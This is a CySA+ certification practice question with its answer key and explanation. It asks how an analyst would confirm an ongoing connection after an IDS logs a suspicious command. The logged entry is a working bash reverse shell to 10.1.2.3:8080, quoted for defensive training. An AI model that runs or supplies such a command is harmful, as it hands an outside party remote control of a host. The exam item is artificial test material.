CompTIA CySA+ (CS0-003) — Question 40

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Answer options

• A. #!/bin/bash nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" || echo "OK"
• B. #!/bin/bash ps -fea | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"
• C. #!/bin/bash ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" || echo "OK"
• D. #!/bin/bash netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

Correct answer: D

Explanation

The correct answer is D because using netstat with the -antp flags will display active network connections, including those listening on port 8080, which can help confirm ongoing malicious activity. Options A and B do not directly assess ongoing connections, while option C is irrelevant since it attempts to list a directory that does not exist.